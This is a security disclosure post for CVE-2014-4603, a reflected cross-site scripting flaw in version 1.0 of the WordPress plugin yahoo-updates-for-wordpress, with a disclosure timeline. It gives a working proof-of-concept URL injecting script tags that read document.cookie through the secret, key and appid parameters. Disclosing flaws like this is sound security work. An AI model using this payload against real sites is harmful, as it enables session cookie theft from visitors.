wp-plugin : yahoo-updates-for-wordpress – A3-Cross-Site Scripting (XSS)


Plugin Details


Plugin Name : yahoo-updates-for-wordpress


Effected Version : 1.0 (and most probably lower version's if any)

Vulnerability : A3-Cross-Site Scripting (XSS)
Identified by : Anant Shrivastava



Technical Details


Minimum Level of Access Required : Unauthenticated


PoC - (Proof of Concept) :


<a href="http://localhost/wp-content/plugins/yahoo-updates-for-wordpress/yupdates_application.php?secret=alert(document.cookie)&key=keyalert(document.cookie)&appid=alert(document.cookie)&”>http://localhost/wp-content/plugins/yahoo-updates-for-wordpress/yupdates_application.php?secret=</script><script>alert(document.cookie)</script>&key=key</script><script>alert(document.cookie)</script>&appid=</script><script>alert(document.cookie)</script>&


Here the parameter ‘secret, key, appid’ is susceptible.


Disclosure Timeline


Vendor Contacted : 2014-01-17

Plugin Status : Closed
Public Disclosure : May 28, 2014
CVE Number : CVE-2014-4603

Plugin Description :
This plugin connects your WordPress blog to your Yahoo! account and creates an update sent to your connections whenever you publish a new blog post. This update contains a title, link and short excerpt of your new post for your connections to click and follow the link back to your blog.

Read more about the [Yahoo! Updates](http://developer.yahoo.com/social/updates/) platform.

Interested in contributing to this plugin? Fork the source on [GitHub](https://github.com/yahoo/yupdates-wordpress/).

The Yahoo! Updates WordPress Plugin code is subject to the BSD license, see the LICENSE file.

Leave a Reply

Your email address will not be published. Required fields are marked *